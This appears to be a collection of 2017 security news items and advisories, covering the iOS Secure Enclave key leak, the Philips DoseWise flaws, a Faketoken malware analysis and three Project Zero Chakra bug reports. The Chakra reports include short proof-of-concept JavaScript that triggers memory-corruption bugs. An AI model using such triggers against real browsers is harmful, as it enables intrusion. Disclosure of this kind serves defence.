It’s Not Exactly Open Season on the iOS Secure Enclave

The black box that is Apple’s iOS Secure Enclave may have been pried open, but that doesn’t necessarily mean it’s open season on iPhones and iPads worldwide.

Yesterday’s public disclosure of the decryption key for the Secure Enclave Processor firmware does indeed allow white and black hats to poke and probe about for vulnerabilities. And while finding a bug is one thing; exploiting it may be quite another.

Very little granular detail has been made public about what’s going on inside Secure Enclave. Probably the best known insight was provided during a 2016 Black Hat talk given by Azimuth Security researchers Tarjei Mandt, David Wang and Mathew Solnik.

They were able to reverse engineer the Secure Enclave Processor (SEP) hardware and software, and determined that while the hardware was state-of-the-art—or better—the software left a bit to be desired. Wang was interviewed on the Risky Business podcast (interview begins at 31:24) nearly a year ago and told host Patrick Gray that there were very little in the way of memory mitigations, though he could see that Apple was constantly tinkering with the security of the Secure Enclave’s software with each successive update.

“We think the hardware is light years ahead of the competition; the software, not so much,” Wang said. “It’s missing a lot of modern exploit mitigation technology; it’s pretty much unprotected.”

This was also disclosed during the Black Hat presentation where it was revealed that things such as ASLR or stack cookie protections were missing at the time.

Mandt, however, yesterday echoed what other researchers have been saying since the key was published: the immediate threat to users is negligible.

“Our research from last year also showed that doing this typically requires additional vulnerabilities in iOS in order to enable an attacker to communicate arbitrary messages (data) to the SEP,” Mandt told Threatpost. “It is also worth noting that Apple by now presumably has addressed the shortcomings that we highlighted last year regarding exploit mitigations, making exploitation harder.”

According to the most recent iOS Security Guide, communication between the Secure Enclave and the iOS application processor—which is entirely separated from the SEP—is done through “an interrupt-driven mailbox and shared memory data buffers.”

As for the lack of ASLR or stack cookies, Wang told Risky Business this could be due to a lack of computing resources in the Secure Enclave microkernel needed to support these mitigations.

The Secure Enclave, as explained in the iOS Security Guide, is a coprocessor onto itself inside the mobile operating system. Its job is to handle cryptographic operations for data protection key management; its separation from the rest of iOS maintains its integrity even if the kernel is compromised, Apple said in the guide. Primarily, the Secure Enclave processes Touch ID fingerprint data, signs off on purchases authorized through the sensor, or unlocks the phone by verifying the user’s fingerprint.

The key was published by a hacker known only as xerub, who refused to identify himself or provide any detail on how he derived the key or whether he found any vulnerabilities in the Secure Enclave. Apple acknowledged the report, but as of yesterday still had not confirmed the legitimacy of the key xerub published. The key unlocks only the SEP firmware; user data is not at risk, xerub told Threatpost.

The disclosure also harkened back to Apple’s decision last June to release an unencrypted version of the iOS 10 kernel to beta testers. “The kernel cache doesn’t contain any user info, and by unencrypting it we’re able to optimize the operating system’s performance without compromising security,” Apple said at the time.

The decision sparked similar concerns as to yesterday’s leak, that attackers as well as legitimate researchers would be able to find and potentially exploit vulnerabilities in the kernel. Apple’s contention is that the move ultimately improves security with more researchers examining the code for bugs and privately disclosing them to the company or through its bug bounty program. Such a move also potentially weakens gray-market sales for iOS bugs, or government hoarding of bugs.

Yesterday’s news set off another flurry of angst as to the ongoing security of iOS and what would happen now that the firmware had been unlocked.

“I wouldn’t say there is any immediate threat to users at this point,” Azimuth Security’s Mandt said. “Although the key disclosure allows anyone to analyze the software that is running on the SEP processor, it still requires an attacker to find and exploit a vulnerability in order to compromise SEP.”

Hacker Publishes iOS Secure Enclave Firmware Decryption Key

A hacker Thursday afternoon published what he says is the decryption key for Apple iOS’ Secure Enclave Processor (SEP) firmware.

The hacker, identified only as xerub, told Threatpost that the key unlocks only the SEP firmware, and that this would not impact user data.

“Everybody can look and poke at SEP now,” xerub said.

Apple did confirm to Threatpost that if the key was legitimate, that user data would not be at risk from this leak. Apple has reportedly yet to confirm the validity of the key.

The Secure Enclave, as explained in the iOS Security Guide, is a coprocessor onto itself inside the mobile operating system. Its job is to handle cryptographic operations for data protection key management; its separation from the rest of iOS maintains its integrity even if the kernel is compromised, Apple said in the guide.

Primarily, the Secure Enclave processes Touch ID fingerprint data, signs off on purchases authorized through the sensor, or unlocks the phone by verifying the user’s fingerprint.

Publishing of the key now exposes the Secure Enclave to researchers and attackers alike, both of which will be able to examine the previously walled-off processor for vulnerabilities and gain insight into how it operates.

“Hopefully Apple will work harder now that they can’t hide SEP, resulting in improved security for users,” xerub said.

Xerub would not provide any details on how he decrypted the key, nor would he comment on whether he looked for, or found any, vulnerabilities in the Secure Enclave once he had access. He also would not comment on whether he privately disclosed his finding to Apple in advance.

“This isn’t really bad in my opinion,” said Patrick Wardle, chief security researcher at Synack and founder of Objective-See. “[This] just means the security researchers, and yes hackers, can now look at the firmware for bugs. Before, it was encrypted so they couldn’t audit and analyze it. Is a system less secure if people can audit it? Yes. Hackers can and will also look for bugs now too.”

The question that’s left out in the open is whether xerub was able to leverage a vulnerability or weakness in Secure Enclave to decrypt the key, and whether Apple will be able to implement a new encryption key for Secure Enclave, should it choose to do so.

Until today, there had been very little public information about Secure Enclave. Apple is notoriously tight-lipped about security and infrequently talks about the machinations keeping iOS or any of its platforms safe.

A 2016 Black Hat presentation, below, on Secure Enclave by Azimuth Security’s Tarjei Mandt, Mathew Solnik and David Wang, was one of the deepest dives behind this mysterious curtain. The researchers did go into some high-level detail about its design and security resilience, but little is known about its implementation.

As for TouchID, it’s been available since the iPhone 5S was released and iPad2. In addition to unlocking the phone with a fingerprint, users could likewise approve transactions through Apple Pay, the Apple App Store, iBooks and other online stores. The Secure Enclave watches over it, processing finger print data and determining whether there is a match against fingerprints the user has already registered on the device, the iOS Security Guide says.

“Communication between the processor and the Touch ID sensor takes place over a serial peripheral interface 
bus,” the iOS Security Guide says. “The processor forwards the data to the Secure Enclave but can’t read it. It’s encrypted and authenticated with a session key that is negotiated using the device’s shared key that is provisioned for the Touch ID sensor and the Secure Enclave. The session key exchange uses AES key wrapping with both sides providing a random key that establishes the session key and uses AES-CCM transport encryption.”

Philips' DoseWise Portal Vulnerabilities

OVERVIEW

Philips has identified Hard-coded Credentials and Cleartext Storage of Sensitive Information vulnerabilities in Philips’ DoseWise Portal (DWP) web application. Philips has updated product documentation and produced a new version that mitigates these vulnerabilities.

These vulnerabilities could be exploited remotely.

AFFECTED PRODUCTS

The following Philips DWP versions are affected:

  • DoseWise Portal, Versions 1.1.7.333 and 2.1.1.3069

IMPACT

Successful exploitation may allow a remote attacker to gain access to the database of the DWP application, which contains patient health information (PHI). Potential impact could therefore include compromise of patient confidentiality, system integrity, and/or system availability.

Impact to individual organizations depends on many factors that are unique to each organization. NCCIC/ICS-CERT recommends that organizations evaluate the impact of these vulnerabilities based on their operational environment and specific clinical usage.

BACKGROUND

Philips is a global company that maintains offices in several countries around the world, including countries in Africa, Asia, Europe, Latin America, the Middle East, and North America.

The affected product, DWP, is a web-based reporting and tracking tool for radiation exposure. DWP is standalone Class A software in accordance with IEC 62304. According to Philips, the DWP application is deployed across the Healthcare and Public Health sector. Philips indicates that these products are used primarily in Australia, the United States, Japan, and Europe.

VULNERABILITY CHARACTERIZATION

VULNERABILITY OVERVIEW

USE OF HARD-CODED CREDENTIALS

The backend database of the DWP application uses hard-coded credentials for a database account with privileges that can affect confidentiality, integrity, and availability of the database. For an attacker to exploit this vulnerability, elevated privileges are first required for an attacker to access the web application backend system files that contain the hard-coded credentials. Successful exploitation may allow a remote attacker to gain access to the database of the DWP application, which contains PHI.

CVE-2017-9656 has been assigned to this vulnerability. A CVSS v3 base score of 9.1 has been assigned; the CVSS vector string is (AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H).

CLEARTEXT STORAGE OF SENSITIVE INFORMATION

The web-based application stores login credentials in clear text within backend system files.

CVE-2017-9654 has been assigned to this vulnerability. A CVSS v3 base score of 6.5 has been assigned; the CVSS vector string is (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N).

VULNERABILITY DETAILS

EXPLOITABILITY

These vulnerabilities could be exploited remotely.

EXISTENCE OF EXPLOIT

No known public exploits specifically target these vulnerabilities.

DIFFICULTY

An attacker with a low skill would be able to exploit these vulnerabilities.

MITIGATION

Philips is scheduled to release a new product version and supporting product documentation in August 2017. For all users of DWP Version 2.1.1.3069, Philips will update the DWP installation to Version 2.1.2.3118. This update will replace the authentication method and eliminate hard-coded/fixed password vulnerabilities from the DWP system.

All users of DWP Version 1.1.7.333 will be supported by Philips to reconfigure the DWP installation to change and fully encrypt all stored passwords.

Philips has notified users of the identified vulnerabilities and will coordinate with users to schedule updates. Philips encourages users to use Philips-validated and authorized changes only for the DWP system supported by Philips’ authorized personnel or under Philips’ explicit published directions for product patches, updates, or releases.

As an interim mitigation, until the update can be applied, Philips recommends that users:

  • Ensure that network security best practices are implemented, and
  • Block Port 1433, except where a separate SQL server is used.

Philips’ advisory is available at the following URL:

http://www.philips.com/productsecurity

DWP users with questions should contact their local Philips service support team or their regional service support. Contact information is available at the following location:

http://www.usa.philips.com/healthcare/solutions/customer-service-solutions

ICS-CERT recommends that users take defensive measures to minimize the risk of exploitation of these vulnerabilities. Specifically, users should:

  • Minimize network exposure for all medical devices and/or systems, and ensure that they are not accessible from the Internet.
  • Locate all medical devices and remote devices behind firewalls, and isolate them from the business network.
  • When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.

ICS-CERT also provides a section for security recommended practices on the ICS-CERT web page at http://ics-cert.us-cert.gov/content/recommended-practices. ICS-CERT reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.

Additional mitigation guidance and recommended practices are publicly available in the ICS‑CERT Technical Information Paper, ICS-TIP-12-146-01B–Targeted Cyber Intrusion Detection and Mitigation Strategies, that is available for download from the ICS-CERT web site (http://ics-cert.us-cert.gov/).

Organizations observing any suspected malicious activity should follow their established internal procedures and report their findings to ICS-CERT for tracking and correlation against other incidents.

IBM researchers: Rowhammer-like attack on flash memory can provide root privileges to attacker

IBM researchers: Rowhammer-like attack on flash memory can provide root privileges to attacker – Myce.com

IBM researchers: Rowhammer-like attack on flash memory can provide root privileges to attacker

The way NAND flash memory used in Solid State Disks (SSDs) works, makes it possible for an attacker with write access to get root privileges on a system, researchers from IBM demonstrated during the WOOT ’17 conference currently held in Vancouver. The method they’ve demonstrated works similar to that of the ‘Rowhammer’ DRAM attack.

Rowhammer is a vulnerability in DRAM memory that allows an attacker to manipulate memory without accessing it. By repeatedly accessing a specific memory location somewhere in memory a bit can unintendedly ‘flip’, meaning that a ‘1’ can flip to a ‘0’ or vice versa. By flipping bits it’s eventually possible to get read and write access to all physical memory after which it’s possible to get kernel privileges.

The Rowhammer attack was already demonstrated in 2015 and researchers from IBM were curious to find out whether a similar attack was also possible against SSD drives with MLC NAND flash memory.

“DRAM is not the only place that holds sensitive data that is essential to the correct working of security primitives implemented in software,” the researchers write in their report. Also through the filesystem used by the operating system it’s possible to gain access to sensitive data. In their tests the researchers used the ext3 filesystem on Linux.

However also other software could be a threat, according to the researchers, “any program (in the broad sense) that accesses the SSD, directly or indirectly, is potentially a target for non physical integrity attacks on SSDs.”

In their scenario, the researchers assume that the victim runs a filesystem on a SSD disk that consists of MLC NAND flash memory. They also assume that the attacker has ‘unprivileged’ rights ( i.e non root) to the system and that corruption of the underlying Flash media is possible The attacker doesn’t need to have physical access to the system, it could also be a server with shell access.

Just like with the Rowhammer attack on DRAM memory, NAND flash chips of SSDs can be manipulated in a similar way which allows an attacker to elevate his rights on the system. To protect against the attack, a SSD can be encrypted. In the future the attackers hope to demonstrate a full system attack.

Several hardware manufacturers such as Google and Apple released updates for their devices in response to the Rowhammer attack. It’s unclear whether the IBM researchers informed hardware manufacturers about their attack on SSDs.

Full report here (.PDF) | via Security.nl

Update: Our reporting was incorrect, here is a comment from the author of the report:  “Author here, I would like to set the record straight.We do not claim to have an attack on SSDs. The journalist seems to have misunderstood and not read the paper. The attack demonstrated is not on an FPGA or SSD. The main point this paper makes and demonstrates is that if you can cause corruption of a full block (i.e., completely garble contents of a chosen block), then you can elevate privileges (with some assumptions, like using ext3). Note that this result does not depend on whether you are using an SSD, a disk, or any other storage for your filesystem.”

London council ‘failed to test’ parking ticket app, exposed personal info

London council ‘failed to test’ parking ticket app, exposed personal info • The Register

London council ‘failed to test’ parking ticket app, exposed personal info

Authority fined £70k after missing URL manipulation

A London council has been fined £70,000 after design faults in its TicketViewer app allowed unauthorised access to 119 documents containing sensitive personal information.

The parking ticket application, set up in 2012, was developed by Islington council’s internal application team for the authority’s parking services.

It allowed people issued with a parking ticket in the north London borough to log on using their car registration number and see CCTV images or videos of their alleged offence.

They could then appeal this ticket by sending supporting evidence – which might include details of health issues, disabilities or finances – to the council by email or post. The back office would scan and upload this information into the system as a ticket attachment folder.

That brought together a person’s car reg, name, address and potentially medical and financial details – so you’d hope the council had properly tested the system.

But it seems this was not to be, and in October 2015 a concerned citizen alerted the council to the fact that these ticket attachment folders could be accessed if a user tweaked the URL.

Between the launch of the site in 2012 and the date the issue was reported, 825,000 parking tickets had been issued and 270,000 appeals received.

On October 25, 2015, the ticket attachment folders contained personal data relating to 89,000 users while internal testing showed that 119 documents had been accessed a total of 235 times from 36 unique IP addresses.

That information was related to 71 users – although an investigation by the UK’s data protection watchdog found that there was no evidence that anyone had actually been harmed by the breach.

However, the Information Commissioner’s Office found that the council had failed to take proper technical measures to stop unauthorised access to the information, and handed it a £70,000 fine (PDF) for breaching the Data Protection Act.

The ICO said that the folder browsing functionality in the web server was misconfigured and that the application had design faults.

“The council should have tested the system both prior to going live and regularly after that,” it said.

“For no good reason, Islington appears to have overlooked the need to ensure that it had robust measures in place despite having the financial and staffing resources available.”

The council notified both the ICO and the people whose data was exposed and, in a statement sent to The Register today, once again apologised for the breach.

“We remain very sorry about the previous TicketViewer problem and agree with the ICO that we failed to meet the required data protection standards back in 2015,” a spokesperson said.

“As soon as we were aware of the problem we took every possible action to prevent a recurrence and instructed auditors to carry out a thorough review so we could learn from our mistake.”

The council added that it had taken advantage of the reduced fine offered by the ICO for early payment, which cut the costs to £56,000. 

Booking a Taxi for Faketoken

The Trojan-Banker.AndroidOS.Faketoken malware has been known about for already more than a year. Throughout the time of its existence, it has worked its way up from a primitive Trojan intercepting mTAN codes to an encrypter. The authors of its newer modifications continue to upgrade the malware, while its geographical spread is growing. Some of these modifications contain overlay mechanisms for about 2,000 financial apps. In one of the newest versions, we also detected a mechanism for attacking apps for booking taxis and paying traffic tickets issued by the Main Directorate for Road Traffic Safety.

Not so long ago, thanks to our colleagues from a large Russian bank, we detected a new Trojan sample, Faketoken.q, which contained a number of curious features.

Infection

We have not yet managed to reconstruct the entire chain of events leading to infection, but the application icon suggests that the malware sneaks onto smartphones through bulk SMS messages with a prompt to download some pictures.

The malware icon

The structure of the malware

The mobile Trojan that we examined consists of two parts. The first part is an obfuscated dropper (verdict: Trojan-Banker.AndroidOS.Fyec.az): files like this are usually obfuscated on the server side in order to resist detection. At first glance, it may seem that its code is gibberish:

However, this is code works quite well. It decrypts and launches the second part of the malware. This is standard practice these days, whereas unpacked Trojans are very rare.

The second part of the malware, which is a file with DAT extensions, contains the malware’s main features. The data becomes encrypted:

By decrypting the data, it is possible to obtain a rather legible code:

After the Trojan initiates, it hides its shortcut icon and starts to monitor all of the calls and whichever apps the user launches. Upon receiving a call from (or making a call to) a certain phone number, the malware begins to record the conversation and sends it to evildoers shortly after the conversation ends.

The code for recording a conversation

The authors of Faketoken.q kept the overlay features and simplified them considerably. So, the Trojan is capable of overlaying several banking and miscellaneous applications, such as Android Pay, Google Play Store, and apps for paying traffic tickets and booking flights, hotel rooms, and taxis.

Faketoken.q monitors active apps and, as soon as the user launches a specific one, it substitutes its UI with a fake one, prompting the victim to enter his or her bank card data. The substitution happens instantaneously, and the colors of the fake UI correspond to those of the original launched app.

It should be noted that all of the apps attacked by this malware sample have support for linking bank cards in order to make payments. However, the terms of some apps make it mandatory to link a bank card in order to use the service. As millions of Android users have these applications installed, the damage caused by Faketoken can be significant.

However, the following question may arise: what do fraudsters do in order to process a payment if they have to enter an SMS code sent by the bank? Evildoers successfully accomplish this by stealing incoming SMS messages and forwarding them to command-and-control servers.

We are inclined to believe that the version that we got our hands on is still unfinished, as screen overlays contain formatting artifacts, which make it easy for a victim to identify it as fake:

The screen overlays for the UI of a taxi-booking app

As screen overlays are a documented feature widely used in a large number of apps (window managers, messengers, etc.), protecting yourself against such fake overlays is quite complicated, a fact that is exploited by evildoers.

To this day we still have not registered a large number of attacks with the Faketoken sample, and we are inclined to believe that this is one of its test versions. According to the list of attacked applications, the Russian UI of the overlays, and the Russian language in the code, Faketoken.q is focused on attacking users from Russia and CIS countries.

Precautions

In order to avoid falling victim to Faketoken and apps similar to it, we strongly discourage the installation of third-party software on your Android device. A mobile security solution like Kaspersky Mobile Antivirus: Web Security & AppLock would be quite helpful too.

MD5

CF401E5D21DE36FF583B416FA06231D5

Microsoft Edge Chakra Incorrect Jit Optimization

Microsoft Edge: Chakra: incorrect jit optimization with TypedArray setter #3

CVE-2017-8601

Coincidentally, Microsoft released the patch for the <a href=”/p/project-zero/issues/detail?id=1290″ title=”Microsoft Edge: Chakra: incorrect jit optimization with TypedArray setter #2″ class=”closed_ref” rel=”nofollow”> issue 1290 </a> the day after I reported it. But it seems they fixed it incorrectly again.

This time, “func(a, b, i);” is replaced with “func(a, b, {});”.

PoC:
‘use strict’;

function func(a, b, c) {
a[0] = 1.2;
b[0] = c;
a[1] = 2.2;
a[0] = 2.3023e-320;
}

function main() {
let a = [1.1, 2.2];
let b = new Uint32Array(100);

for (let i = 0; i < 0x1000; i++)
func(a, b, {}); // <<———- REPLACED

func(a, b, {valueOf: () => {
a[0] = {};

return 0;
}});

a[0].toString();
}

main();

Tested on Microsoft Edge 40.15063.0.0(Insider Preview).

This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.

Found by: lokihardt

Microsoft Edge Chakra EmitNew Integer Overflow

Microsoft Edge: Chakra: Integer overflow in EmitNew

CVE-2017-8636

The bytecode generator uses the “EmitNew” function to handle new operators.
Here’s the code how the function checks for integer overflow.
void EmitNew(ParseNode* pnode, ByteCodeGenerator* byteCodeGenerator, FuncInfo* funcInfo)
{
Js::ArgSlot argCount = pnode->sxCall.argCount;
argCount++; // include “this”

BOOL fSideEffectArgs = FALSE;
unsigned int tmpCount = CountArguments(pnode->sxCall.pnodeArgs, &fSideEffectArgs);
Assert(argCount == tmpCount);

if (argCount != (Js::ArgSlot)argCount)
{
Js::Throw::OutOfMemory();
}

}

“Js::ArgSlot” is a 16 bit unsigned integer type. And “argCount” is of the type “Js::ArgSlot”. So “if (argCount != (Js::ArgSlot)argCount)” has no point. It can’t prevent the integer overflow at all.

PoC:
let args = new Array(0x10000);
args = args.fill(0x1234).join(‘, ‘);
eval(‘new Array(‘ + args + ‘)’);

This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.

Found by: lokihardt

Microsoft Edge Chakra Parser::ParseFncFormals Uninitialized Arguments

Microsoft Edge: Chakra: Uninitialized arguments 2

CVE-2017-8670

Similar to the <a href=”/p/project-zero/issues/detail?id=1297″ title=”Microsoft Edge: Chakra: Uninitialized arguments” class=”closed_ref” rel=”nofollow”> issue #1297 </a>. But this time, it happends in “Parser::ParseFncFormals” with the “PNodeFlags::fpnArguments_overriddenInParam” flag.

template<bool buildAST>
void Parser::ParseFncFormals(ParseNodePtr pnodeFnc, ParseNodePtr pnodeParentFnc, ushort flags)
{

if (IsES6DestructuringEnabled() && IsPossiblePatternStart())
{

// Instead of passing the STFormal all the way on many methods, it seems it is better to change the symbol type afterward.
for (ParseNodePtr lexNode = *ppNodeLex; lexNode != nullptr; lexNode = lexNode->sxVar.pnodeNext)
{
Assert(lexNode->IsVarLetOrConst());
UpdateOrCheckForDuplicateInFormals(lexNode->sxVar.pid, &formals);
lexNode->sxVar.sym->SetSymbolType(STFormal);
if (m_currentNodeFunc != nullptr && lexNode->sxVar.pid == wellKnownPropertyPids.arguments)
{
m_currentNodeFunc->grfpn |= PNodeFlags::fpnArguments_overriddenInParam; <<—— HERE
}
}


}

PoC:
function f() {
({a = ([arguments]) => {
}} = 1);

arguments.x;
}

f();

This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.

Found by: lokihardt